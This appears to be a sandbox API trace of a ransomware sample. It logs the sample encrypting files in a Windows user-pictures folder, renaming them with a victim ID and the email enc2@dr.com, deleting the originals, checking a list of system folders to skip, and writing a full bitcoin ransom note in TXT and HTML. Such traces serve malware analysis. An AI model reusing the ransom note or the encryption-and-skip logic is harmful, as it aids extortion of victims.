	[0177.278] CryptDestroyKey (hKey=0xfb9230) returned 1
	[0177.278] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.278] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0177.278] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.279] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0177.279] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.279] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.279] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.280] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0177.281] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\user account pictures\\user.png.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 101
	[0177.281] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user.png.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.png.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0177.282] WriteFile (in: hFile=0x390, lpBuffer=0xfde6a0*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfde6a0*, lpNumberOfBytesWritten=0x18b358*=0x1520, lpOverlapped=0x0) returned 1
	[0177.285] CloseHandle (hObject=0x390) returned 1
	[0177.285] CloseHandle (hObject=0x388) returned 1
	[0177.285] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.png")) returned 1
	[0177.289] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.png")) returned 0
	[0177.289] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1518, dwReserved0=0x0, dwReserved1=0x0, cFileName="user.png", cAlternateFileName="")) returned 0
	[0177.289] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0177.289] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0177.289] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures"
	[0177.290] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*"
	[0177.290] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.290] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.290] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\HELP_DECRYPT_YOUR_FILES.TXT") returned 78
	[0177.290] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.291] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.291] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0177.294] CloseHandle (hObject=0x384) returned 1
	[0177.294] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.294] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.295] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0177.296] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.296] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.296] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0177.296] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.297] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0177.297] CloseHandle (hObject=0x384) returned 1
	[0177.297] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.297] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.297] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0177.298] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\HELP_DECRYPT_YOUR_FILES.HTML") returned 79
	[0177.298] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.298] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0177.298] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0177.301] CloseHandle (hObject=0x384) returned 1
	[0177.301] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.302] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.302] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.302] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0177.308] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.308] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.309] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0177.309] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.309] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0177.309] CloseHandle (hObject=0x384) returned 1
	[0177.310] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x8332f8a2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83355bc2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0177.310] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*") returned 54
	[0177.310] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.310] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*", cchLength=0x36 | out: lpsz="c:\\users\\all users\\microsoft\\user account pictures\\*.*") returned 0x36
	[0177.310] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.311] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="windows") returned 0x0
	[0177.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.311] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="boot") returned 0x0
	[0177.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.311] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="system volume information") returned 0x0
	[0177.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.311] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.312] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="temp") returned 0x0
	[0177.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.312] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="program files") returned 0x0
	[0177.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.312] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.312] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="appdata") returned 0x0
	[0177.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.313] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="application data") returned 0x0
	[0177.313] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.313] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="winnt") returned 0x0
	[0177.313] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.313] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="tmp") returned 0x0
	[0177.313] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.313] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="cache") returned 0x0
	[0177.314] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.314] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.314] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.314] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="webcache") returned 0x0
	[0177.314] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.314] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="inetcache") returned 0x0
	[0177.314] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.314] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="nvidia") returned 0x0
	[0177.315] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.315] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="packages") returned 0x0
	[0177.315] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.315] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="cookies") returned 0x0
	[0177.315] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.315] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="programdata") returned 0x0
	[0177.315] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0177.315] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0177.316] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x8332f8a2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83355bc2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.316] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0177.316] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82df84da, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82df84da, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82e6ad01, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x93040, dwReserved0=0x0, dwReserved1=0x0, cFileName="guest.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="GUESTB~1.SCL")) returned 1
	[0177.316] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82f29be0, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82f29be0, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82f29be0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1520, dwReserved0=0x0, dwReserved1=0x0, cFileName="guest.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="GUESTP~1.SCL")) returned 1
	[0177.316] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83355bc2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83355bc2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8337bc75, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0177.316] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8332f8a2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8332f8a2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83355bc2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0177.316] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d47fe2c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d47fe2c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d47fe2c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX.dat", cAlternateFileName="RDHJ0C~1.DAT")) returned 1
	[0177.316] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82f75d0a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82f75d0a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82f75d0a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x970, dwReserved0=0x0, dwReserved1=0x0, cFileName="user-192.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="USER-1~1.SCL")) returned 1
	[0177.316] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83081f36, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83081f36, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83081f36, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="user-32.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="USER-3~1.SCL")) returned 1
	[0177.316] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830cd3ec, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x830cd3ec, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x830cd3ec, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="user-40.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="USER-4~1.SCL")) returned 1
	[0177.316] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830f3434, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x830f3434, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x831196d7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0x0, dwReserved1=0x0, cFileName="user-48.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="USER-4~2.SCL")) returned 1
	[0177.316] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8324a973, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8324a973, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x832bd1f8, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x93040, dwReserved0=0x0, dwReserved1=0x0, cFileName="user.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="USERBM~1.SCL")) returned 1
	[0177.316] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8332f8a2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8332f8a2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8332f8a2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1520, dwReserved0=0x0, dwReserved1=0x0, cFileName="user.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="USERPN~1.SCL")) returned 1
	[0177.317] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8332f8a2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8332f8a2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8332f8a2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1520, dwReserved0=0x0, dwReserved1=0x0, cFileName="user.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="USERPN~1.SCL")) returned 0
	[0177.317] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0177.317] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0177.318] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1
	[0177.318] lstrcmpW (lpString1="Vault", lpString2="..") returned 1
	[0177.318] lstrcmpW (lpString1="Vault", lpString2=".") returned 1
	[0177.318] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0177.318] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0177.318] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="Vault" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault") returned="C:\\Users\\All Users\\Microsoft\\Vault"
	[0177.319] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Vault" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault") returned="C:\\Users\\All Users\\Microsoft\\Vault"
